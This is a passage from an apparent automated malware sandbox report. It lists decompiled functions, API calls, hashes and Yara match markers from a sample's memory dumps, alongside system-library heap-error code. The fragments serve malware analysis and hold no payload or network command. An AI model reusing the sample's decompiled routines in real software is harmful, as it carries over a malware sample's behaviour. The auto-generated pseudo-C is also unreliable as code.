                                              • Instruction Fuzzy Hash: B590027131114802D2106159840471610069BD1341F52C421A1815559E86D58891B162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 94e0e0ede5ac6ffb0405bc8343093019de9562c0f6ce0fc2e53a18c307eb478d
                                              • Instruction ID: 8c86e518a7ddb8b5db8fb5d7a0efe172cde5176f73e413ffa383af29e32a87e3
                                              • Opcode Fuzzy Hash: 94e0e0ede5ac6ffb0405bc8343093019de9562c0f6ce0fc2e53a18c307eb478d
                                              • Instruction Fuzzy Hash: FE90026130100403D240715954186165006EBE1341F52D021E1405555DD9558856B262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 69855f26aee09ee303036d71ea4faa3890ceea257369e58085e530091ad9d1e4
                                              • Instruction ID: 31ea367c690b668709b195a88787ee15fab9a41c433464e7d60a5ec52fea3918
                                              • Opcode Fuzzy Hash: 69855f26aee09ee303036d71ea4faa3890ceea257369e58085e530091ad9d1e4
                                              • Instruction Fuzzy Hash: E390026921300402D2807159540861A10069BD1342F92D425A1006559DC9558869B361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9f9da8027f0b853cd37062ca905926b4c8087327664200e69209f191f7d65c1b
                                              • Instruction ID: 8e5b64fa19e6e17a6ba4d9724058b9e344b7d3caafb093bc1fde321bf00b7163
                                              • Opcode Fuzzy Hash: 9f9da8027f0b853cd37062ca905926b4c8087327664200e69209f191f7d65c1b
                                              • Instruction Fuzzy Hash: E890027120100802D2006599540865610069BE0341F52D021A6015556FC6A58891B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                              • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                              • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                              • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004188F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: %mA
                                              • API String ID: 3298025750-273627637
                                              • Opcode ID: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                              • Instruction ID: ff75906eec445189a7608ef16a07370f9ba81c6555a21011093ab971dc24f262
                                              • Opcode Fuzzy Hash: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                              • Instruction Fuzzy Hash: 56F0BEB82082856BEB00EF689CC08AB7794BF80318710895EFC4947243D634D95987A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E004188C0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _t10;
				void* _t12;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t12 =  *_t6;
				_push(_a16);
				_push(_a12);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}






                                              0x004188d7
                                              0x004188e2
                                              0x004188e2
                                              0x004188e8
                                              0x004188eb
                                              0x004188ed
                                              0x004188f1

                                              APIs
                                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: F5A
                                              • API String ID: 1279760036-683449296
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004188FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: F5A
                                              • API String ID: 1279760036-683449296
                                              • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction ID: 25b7ab50de32ca0460f32ce6d2cc7201fc87e64a3a46fad92a8330604ac2ee33
                                              • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction Fuzzy Hash: B6A022B3B20088000020B3F23C083EAE20C80C33BB2200CEFC00C30003888BC088322E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E00407290(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B50(__ebx, __edi, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092B0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                              0x00407290
                                              0x0040729f
                                              0x004072a3
                                              0x004072ae
                                              0x004072ba
                                              0x004072be
                                              0x004072ce
                                              0x004072d3
                                              0x004072da
                                              0x004072dc
                                              0x004072dd
                                              0x004072ea
                                              0x004072ec
                                              0x004072ee
                                              0x0040730b
                                              0x0040730b
                                              0x00000000
                                              0x0040730d
                                              0x00407312

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 30%
                                              			E00418900(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
				char _t15;
				void* _t22;

				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E004191F0(_t22);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}





                                              0x00418905
                                              0x00418914
                                              0x00418917
                                              0x0041892d
                                              0x00418931

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                              0x00418a7a
                                              0x00418a90
                                              0x00418a94

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                              0x00418943
                                              0x0041895a
                                              0x00418968

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d69a568bd3c01bd6b1b8741695a98502ac883f7ddb1346542a67ed32ce26cf6c
                                              • Instruction ID: 1dc07bb8ff6b6698401254127e0ab06c4744a782e5ceb09ce967f87617a1cb2b
                                              • Opcode Fuzzy Hash: d69a568bd3c01bd6b1b8741695a98502ac883f7ddb1346542a67ed32ce26cf6c
                                              • Instruction Fuzzy Hash: 2BB09B71D054C5C5D711D761460872779017BD0751F17C062D2020641B4778C4D1F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0105B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                              Download Yara Rule
                                              Strings
                                              • <unknown>, xrefs: 0105B27E, 0105B2D1, 0105B350, 0105B399, 0105B417, 0105B48E
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0105B39B
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0105B323
                                              • *** enter .cxr %p for the context, xrefs: 0105B50D
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0105B47D
                                              • Go determine why that thread has not released the critical section., xrefs: 0105B3C5
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0105B2DC
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0105B476
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0105B2F3
                                              • The resource is owned shared by %d threads, xrefs: 0105B37E
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0105B352
                                              • write to, xrefs: 0105B4A6
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0105B48F
                                              • This failed because of error %Ix., xrefs: 0105B446
                                              • *** then kb to get the faulting stack, xrefs: 0105B51C
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0105B484
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0105B38F
                                              • The critical section is owned by thread %p., xrefs: 0105B3B9
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0105B53F
                                              • *** enter .exr %p for the exception record, xrefs: 0105B4F1
                                              • The instruction at %p referenced memory at %p., xrefs: 0105B432
                                              • *** Inpage error in %ws:%s, xrefs: 0105B418
                                              • an invalid address, %p, xrefs: 0105B4CF
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0105B314
                                              • The instruction at %p tried to %s , xrefs: 0105B4B6
                                              • read from, xrefs: 0105B4AD, 0105B4B2
                                              • The resource is owned exclusively by thread %p, xrefs: 0105B374
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0105B3D6
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0105B305
                                              • a NULL pointer, xrefs: 0105B4E0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: dfd14030b21049c11a3252874088599c26ad331f46af481621d3585f4fcf1b59
                                              • Instruction ID: 70dc9f0838b235415b18b231182e80a55936f45ab5f8c804b2561412aa22f7e6
                                              • Opcode Fuzzy Hash: dfd14030b21049c11a3252874088599c26ad331f46af481621d3585f4fcf1b59
                                              • Instruction Fuzzy Hash: 54811535A00200FFEF666A099C46EBB3F6AEF96B55F404084F9842B162D761E451EB73
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01061C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E01061C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xf848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FAB150();
				} else {
					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x109589c);
				E00FAB150("Heap error detected at %p (heap handle %p)\n",  *0x10958a0);
				_t27 =  *0x1095898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01061E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FAB150();
				} else {
					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FAB150("Error code: %d - %s\n",  *0x1095898);
				_t113 =  *0x10958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Parameter1: %p\n",  *0x10958a4);
				}
				_t115 =  *0x10958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Parameter2: %p\n",  *0x10958a8);
				}
				_t117 =  *0x10958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FAB150("Parameter3: %p\n",  *0x10958ac);
				}
				_t119 =  *0x10958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FAB150();
					} else {
						E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10958b4);
					E00FAB150("Last known valid blocks: before - %p, after - %p\n",  *0x10958b0);
				} else {
					_t120 =  *0x10958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FAB150();
				} else {
					E00FAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FAB150("Stack trace available at %p\n", 0x10958c0);
			}











                                              0x01061c10
                                              0x01061c16
                                              0x01061c1e
                                              0x01061c3d
                                              0x01061c3e
                                              0x01061c20
                                              0x01061c35
                                              0x01061c3a
                                              0x01061c44
                                              0x01061c55
                                              0x01061c5a
                                              0x01061c65
                                              0x01061c67
                                              0x00000000
                                              0x01061c6e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x01061c67
                                              0x01061cdc
                                              0x01061ce5
                                              0x01061d04
                                              0x01061d05
                                              0x01061ce7
                                              0x01061cfc
                                              0x01061d01
                                              0x01061d0b
                                              0x01061d17
                                              0x01061d1f
                                              0x01061d25
                                              0x01061d30
                                              0x01061d4f
                                              0x01061d50
                                              0x01061d32
                                              0x01061d47
                                              0x01061d4c
                                              0x01061d61
                                              0x01061d67
                                              0x01061d68
                                              0x01061d6e
                                              0x01061d79
                                              0x01061d98
                                              0x01061d99
                                              0x01061d7b
                                              0x01061d90
                                              0x01061d95
                                              0x01061daa
                                              0x01061db0
                                              0x01061db1
                                              0x01061db7
                                              0x01061dc2
                                              0x01061de1
                                              0x01061de2
                                              0x01061dc4
                                              0x01061dd9
                                              0x01061dde
                                              0x01061df3
                                              0x01061df9
                                              0x01061dfa
                                              0x01061e00
                                              0x01061e0a
                                              0x01061e13
                                              0x01061e32
                                              0x01061e33
                                              0x01061e15
                                              0x01061e2a
                                              0x01061e2f
                                              0x01061e39
                                              0x01061e4a
                                              0x01061e02
                                              0x01061e02
                                              0x01061e08
                                              0x00000000
                                              0x00000000
                                              0x01061e08
                                              0x01061e5b
                                              0x01061e7a
                                              0x01061e7b
                                              0x01061e5d
                                              0x01061e72
                                              0x01061e77
                                              0x01061e95

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 00a20a369aae42358fcf696f59d4827e61750c13a64cd0e9475ad1ec85b8033e
                                              • Instruction ID: 544a948ebb63d8e139dfe31963356b59c7459711c1a87240bd9768d353fbec88
                                              • Opcode Fuzzy Hash: 00a20a369aae42358fcf696f59d4827e61750c13a64cd0e9475ad1ec85b8033e
                                              • Instruction Fuzzy Hash: 9F61C536925144DFE711EB49ECA5D2973ECEB44B30B09807AF549AF353C639D840EB1A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FB3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00FB3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00FB1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00FB1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00FB1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00FB1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00FB1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00FC4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
